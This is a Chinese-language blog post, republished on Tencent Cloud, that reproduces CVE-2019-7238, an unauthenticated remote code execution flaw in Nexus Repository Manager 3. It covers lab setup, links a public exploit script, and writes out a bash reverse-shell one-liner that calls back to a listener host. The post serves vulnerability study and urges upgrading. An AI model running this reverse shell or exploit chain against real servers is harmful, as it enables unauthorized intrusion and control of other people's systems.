前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2019-7238 Nexus Repository Manager 3 RCE漏洞复现

CVE-2019-7238 Nexus Repository Manager 3 RCE漏洞复现

作者头像
用户1631416
发布2019-08-05 14:11:46
3.6K0
发布2019-08-05 14:11:46
举报
文章被收录于专栏:玄魂工作室玄魂工作室

0X1 漏洞概述

Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,可以简单的理解为Maven的私服。

2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。

漏洞影响版本包括

代码语言:javascript
复制
Nexus Repository Manager OSS/Pro 3.6.2-3.14.0 

0X2 环境搭建

漏洞环境安装包下载链接

代码语言:javascript
复制
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3

在这里,我们下载nexus-3.13.0-01-unix.tar.gz安装包。

在Ubuntu16中配置好java环境,然后解压安装包之后,在nexus-3.13.0-01/bin/目录中启动环境

代码语言:javascript
复制
./nexus run

浏览器访问

代码语言:javascript
复制
http://172.16.1.137:8081

至此,环境就搭建成功了!

0X3漏洞利用

环境的默认账户密码是admin/admin123,登录之后,上传一个任意jar文件。而真实环境则不需要,因为真实环境已经上传了assert。如下图所示。

然后下载漏洞利用脚本

代码语言:javascript
复制
https://github.com/mpgn/CVE-2019-7238

运行脚本之后,执行反弹shell脚本:

代码语言:javascript
复制
bash -i >& /dev/tcp/172.16.1.180/12345 0>&1

漏洞利用成功!

漏洞稍微有些鸡肋,因为在Zoomeye和shodan上搜索发现很多的环境上并没有部署jar包,所以导致难以利用,但是对于部署此应用的企业来讲,还是尽快加固升级到最新版最安全。

0X4漏洞总结

网上已经有很多分析的文章了在,故在此就不多做分析了,可以参考一些paper进行漏洞跟踪学习。

https://paper.seebug.org/827/

https://xz.aliyun.com/t/4136

https://chybeta.github.io/2019/02/18/Nexus-Repository-Manager-3-RCE-%E5%88%86%E6%9E%90-%E3%80%90CVE-2019-7238%E3%80%91/

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-08-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 玄魂工作室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档